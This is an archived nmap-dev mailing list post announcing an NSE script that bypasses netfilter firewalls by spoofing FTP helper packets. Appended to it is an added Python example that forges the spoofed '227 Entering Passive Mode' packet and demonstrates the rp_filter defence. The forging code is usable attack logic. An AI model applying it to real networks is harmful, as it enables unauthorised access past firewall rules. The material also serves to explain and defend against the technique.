Nmap Development mailing list archives

[NSE] firewall-bypass


From: Hani Benhabiles <kroosec () gmail com>
Date: Tue, 05 Jun 2012 22:23:36 +0100

Hi list,

description = [[
Exploits a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.

The script works by spoofing a packet from the target server that asks the firewall to open a related connection; the firewall's protocol helper for the helper port (ftp) honours the request and lets the attacker reach the target port. The firewall must be on the same network segment as the attacking machine for this to work. Reverse path filtering (rp_filter) prevents this kind of attack. The script supports only the ftp helper at the moment.

Based on work done by Eric Leblond.

For more information, see:
* http://home.regit.org/2012/03/playing-with-network-layers-to-bypass-firewalls-filtering-policy/
]]

---
-- @args firewall-bypass.helper The helper to use. Defaults to <code>ftp</code>.
-- Supported helpers: ftp.
--
-- @args firewall-bypass.helperport If not using the helper's default port.
--
-- @args firewall-bypass.targetport Port to test vulnerability on. Target port should be a
-- non-open port. If not given, the script will try to find a filtered or closed port from
-- the port scan results.
--
-- @usage
-- nmap --script firewall-bypass <target>
-- nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp",firewall-bypass.targetport=22 <target>
--
-- @output
-- Host script results:
-- | firewall-bypass:
-- |_  Firewall vulnerable to bypass through ftp helper.


Cheers,
Hani.

--
Hani Benhabiles

Twitter: https://twitter.com/#!/kroosec
Blog: http://kroosec.blogspot.com

Attachment: firewall-bypass.nse
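What the probe looks like on the wire, as an added example that is not the attached NSE script (which is Lua) nor Eric Leblond's code: it forges the FTP "227 Entering Passive Mode" reply the script sends with the target server's address as source, shows what a conntrack helper that trusts that packet derives from it (a RELATED expectation for attacker -> target:targetport), and shows the strict reverse-path check that drops the forgery because the claimed source is not reachable through the interface it arrived on. All addresses, ports and the routing table are made up; delivery of the packet (the script hands it to the firewall's MAC at the link layer, hence the same-segment requirement) is left out.

```python
# Added example, not the firewall-bypass.nse script itself. Addresses, ports
# and the routing table are constructed for illustration.
import ipaddress
import socket
import struct

FTP_PORT = 21  # default helper port the script spoofs as the source port


def pasv_reply(ip: str, port: int) -> bytes:
    """Forge the '227 Entering Passive Mode' line a real FTP server would send."""
    a, b, c, d = (int(x) for x in ip.split("."))
    return f"227 Entering Passive Mode ({a},{b},{c},{d},{port >> 8},{port & 0xFF}).\r\n".encode()


def parse_pasv(payload: bytes):
    """Parse a 227 line the way a helper does; returns (ip, port) or None."""
    text = payload.decode("ascii", "replace")
    if not text.startswith("227"):
        return None
    lo, hi = text.find("("), text.find(")")
    if lo < 0 or hi < lo:
        return None
    try:
        nums = [int(x) for x in text[lo + 1:hi].split(",")]
    except ValueError:
        return None
    if len(nums) != 6 or any(not 0 <= n <= 255 for n in nums):
        return None
    return ".".join(map(str, nums[:4])), (nums[4] << 8) | nums[5]


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum (IPv4 header, TCP pseudo-header + segment)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src_ip, src_port, dst_ip, dst_port, seq, ack, payload, flags=0x18):
    """Minimal IPv4 + TCP (PSH|ACK) datagram, no options, checksums filled in."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, ack, 5 << 4, flags, 8192, 0, 0)
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, socket.IPPROTO_TCP, len(tcp) + len(payload))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0x1234, 0x4000, 64, socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def spoofed_helper_trigger(target_ip, target_port, client_ip, client_port, helper_port=FTP_PORT):
    """The injected packet: looks like target:21 telling the attacker's FTP control
    connection (client_ip:client_port) to open a data connection to target:target_port."""
    return build_ipv4_tcp(target_ip, helper_port, client_ip, client_port,
                          seq=1000, ack=1000, payload=pasv_reply(target_ip, target_port))


def verify_checksums(pkt: bytes) -> bool:
    """Valid checksums fold to zero when re-summed with the checksum field included."""
    ihl = (pkt[0] & 0x0F) * 4
    pseudo = struct.pack("!4s4sBBH", pkt[12:16], pkt[16:20], 0, pkt[9], len(pkt) - ihl)
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + pkt[ihl:]) == 0


def helper_expectation(pkt: bytes):
    """What a helper that trusts the packet derives: client -> dst:dport becomes a
    RELATED expectation, so the firewall accepts that connection."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != socket.IPPROTO_TCP:
        return None
    if struct.unpack("!H", pkt[ihl:ihl + 2])[0] != FTP_PORT:
        return None  # the helper is only attached to the ftp control port
    doff = (pkt[ihl + 12] >> 4) * 4
    pasv = parse_pasv(pkt[ihl + doff:])
    if pasv is None:
        return None
    return {"client": socket.inet_ntoa(pkt[16:20]), "server": socket.inet_ntoa(pkt[12:16]),
            "dst": pasv[0], "dport": pasv[1]}


def rp_filter_accepts(src_ip: str, in_iface: str, routes) -> bool:
    """Strict reverse-path check (simplified rp_filter=1): accept only if the longest
    matching route back to src_ip leaves via the interface the packet arrived on."""
    addr = ipaddress.ip_address(src_ip)
    best = None
    for net, iface in routes:
        n = ipaddress.ip_network(net)
        if addr in n and (best is None or n.prefixlen > best[0].prefixlen):
            best = (n, iface)
    return best is not None and best[1] == in_iface


# Constructed topology: protected server on eth0, attacker on eth1.
ROUTES = [("0.0.0.0/0", "eth0"), ("10.0.0.0/24", "eth0"), ("192.168.1.0/24", "eth1")]

if __name__ == "__main__":
    pkt = spoofed_helper_trigger("10.0.0.5", 22, "192.168.1.77", 40123)
    print(helper_expectation(pkt))                          # helper relates 192.168.1.77 -> 10.0.0.5:22
    print(rp_filter_accepts("10.0.0.5", "eth1", ROUTES))    # False: rp_filter drops the forgery
```

The forged segment carries a plausible source (target:21) and a syntactically valid 227 line, which is all the helper checks; it never verifies that the packet belongs to a real server reply. The reverse-path check works at a different layer: a packet claiming 10.0.0.5 as source but arriving on the attacker's interface is dropped before conntrack ever parses it, which is why the docstring names rp_filter as the defence.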
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
